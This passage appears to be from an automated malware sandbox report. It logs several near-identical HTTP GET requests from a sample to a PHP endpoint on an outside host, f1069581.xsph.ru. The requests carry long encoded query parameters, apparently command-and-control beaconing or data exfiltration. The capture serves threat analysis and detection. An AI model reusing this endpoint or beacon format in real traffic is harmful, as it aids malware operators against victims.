(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
